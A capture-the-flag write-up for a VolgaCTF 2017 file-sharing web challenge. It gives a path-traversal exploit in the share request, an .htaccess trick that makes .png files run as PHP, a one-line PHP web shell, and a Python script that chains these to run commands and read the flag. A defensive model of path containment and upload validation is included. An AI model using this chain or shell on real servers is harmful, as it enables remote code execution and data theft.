Description:
Look! I wrote a good service for sharing your files with your friends, enjoy)

Solution:
1. Accessed the target and found a login page. After logging in, three functions appear: Upload, Files and Share.
Upload - upload a file.
Files - list of uploaded files.
Share - share an uploaded file with another user.
2. Tried to upload a PHP file; the upload was rejected.
3. Tried to upload a PNG image file; the upload succeeded.
4. Tested the share function by sharing meme.png with another user.
5. Intercepting the share request with Burp Suite shows that the filename parameter is vulnerable to path traversal: I can share ../../index.php with another user, then log in as that user and read the PHP source.
6. As the other user, I downloaded index.php into my folder.
Folder structure: http://share-point.quals.2017.volgactf.ru/files/<username>/<file upload>
7. List of files.
8. But when I access index.php it returns 500 Internal Server Error, so that does not work :(
9. After a few minutes of thinking I tried a .htaccess file to make Apache process files ending in .png as PHP:
AddType application/x-httpd-php .png
10. Uploaded .htaccess and shell.png, where shell.png contains a simple PHP web shell that passes the command from the request to the system function.
11. Find the flag: find / -name "*flag*"
12. cat /opt/flag.txt
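The two server-side checks the chain above relies on being absent (no containment check on the share filename, and an upload filter that blocks .php but lets .htaccess and a PHP body in a .png through) can be modelled in a few lines. The following is an added example and not the challenge's PHP: the upload root path, the image allowlist and the magic-byte table are assumptions, and the sample requests are reconstructed from the steps above.

```python
import os
import re

# Model of the server-side checks the challenge lacked. Added example, not
# the challenge's PHP. The path below is an assumption; the writeup only
# shows the URL layout files/<username>/<file>.
UPLOAD_ROOT = "/var/www/html/files"

ALLOWED_EXTENSIONS = {"png", "jpg", "jpeg", "gif"}
# Leading bytes of the accepted image types (constructed lookup table).
MAGIC = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "gif": b"GIF8",
}
# One stem, one extension, no dots or slashes elsewhere: rejects ".htaccess"
# (empty stem), "shell.php.png" (two dots) and "../x.png" (slash).
SAFE_NAME = re.compile(r"^[A-Za-z0-9_-]{1,64}\.([A-Za-z0-9]{1,5})$")


def share_path_vulnerable(username, filename):
    """The bug from the writeup: the filename from the share request is
    joined under files/<username>/ with no check, so '../../index.php'
    walks out of the user's folder."""
    return os.path.normpath(os.path.join(UPLOAD_ROOT, username, filename))


def share_path_safe(username, filename):
    """Resolve the requested file and refuse anything that does not stay
    inside files/<username>/. Returns the absolute path, or None."""
    user_dir = os.path.realpath(os.path.join(UPLOAD_ROOT, username))
    # realpath collapses '..' and follows symlinks; an absolute filename
    # makes os.path.join discard user_dir entirely, which the prefix
    # check below also catches.
    target = os.path.realpath(os.path.join(user_dir, filename))
    if target == user_dir or os.path.commonpath([user_dir, target]) != user_dir:
        return None
    return target


def validate_upload(filename, head):
    """Decide whether an upload may be stored. `head` is the first bytes
    of the file body. Returns (True, stored_name) or (False, reason)."""
    name = os.path.basename(filename)  # never trust client-supplied paths
    m = SAFE_NAME.match(name)
    if not m:
        return False, "filename not in allowed form"
    ext = m.group(1).lower()
    if ext not in ALLOWED_EXTENSIONS:
        return False, "extension not allowed"
    # The client's Content-Type header is attacker-controlled; look at the
    # bytes instead. This still passes a PNG with PHP appended, which is
    # why the dotfile rejection above and an Apache config with
    # AllowOverride None / no PHP handler for this directory matter more.
    if not head.startswith(MAGIC[ext]):
        return False, "content does not match extension"
    return True, name


if __name__ == "__main__":
    # Inputs from the writeup, reconstructed as sample data.
    for name in ["meme.png", "../../index.php"]:
        print("share", name, "-> vulnerable:", share_path_vulnerable("administrator", name),
              "| safe:", share_path_safe("administrator", name))
    samples = [
        (".htaccess", b"AddType application/x-httpd-php .png"),
        ("shell.png", b"<?php system($_GET['cmd']); ?>"),  # constructed shell body
        ("meme.png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 8),
    ]
    for name, body in samples:
        print("upload", name, "->", validate_upload(name, body[:16]))
```

The containment check is the one that closes step 5: with it, ../../index.php resolves outside files/<username>/ and the share is refused. The filename rule is what stops step 10: .htaccess has no stem before the dot and is rejected regardless of its content. A magic-byte check alone is not enough, since a real PNG header followed by PHP passes it; the upload directory must also not be allowed to override the handler (AllowOverride None) or to execute PHP at all.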
My automation script:
#!/usr/bin/env python3
# Author: Kitwipat Towattana
# Automates the chain: log in, upload .htaccess and shell.png, run a command.
import sys
import requests

cmd = sys.argv[1]
s = requests.Session()
username = 'administrator'
password = 'administrator'
htaccess = '.htaccess'      # contains: AddType application/x-httpd-php .png
png_shell = 'shell.png'     # PHP web shell, executed as PHP thanks to .htaccess
url_login = 'http://share-point.quals.2017.volgactf.ru/'
url_upload = 'http://share-point.quals.2017.volgactf.ru/upload.php'
url_file = 'http://share-point.quals.2017.volgactf.ru/files/{0}/{1}'.format(username, png_shell)

def login(username, password):
    data = {"username": username, "password": password}
    return s.post(url_login, data=data).text

def upload(path):
    # 'userFile' is the form field name; the file is stored as files/<username>/<basename>
    with open(path, 'rb') as f:
        return s.post(url_upload, files={'userFile': f}).text

def shell(url_file, cmd):
    # Let requests URL-encode the command (spaces, quotes, &) into ?cmd=
    return s.get(url_file, params={'cmd': cmd}).text

print("[+] Stage 1 Login: {0}".format(login(username, password)))
print("[+] Stage 2 Upload .htaccess: {0}".format(upload(htaccess)))
print("[+] Stage 3 Upload PNG Shell: {0}".format(upload(png_shell)))
print("[+] Command Output: \r\n{0}".format(shell(url_file, cmd)))

'''
>python web200.py "cat /opt/flag.txt"
[+] Stage 1 Login: success
[+] Stage 2 Upload .htaccess: 1
[+] Stage 3 Upload PNG Shell: 1
[+] Command Output:
VolgaCTF{AnoTHer_apPro0Ach_to_file_Upl0Ad_with_PhP}
'''
Flag: VolgaCTF{AnoTHer_apPro0Ach_to_file_Upl0Ad_with_PhP}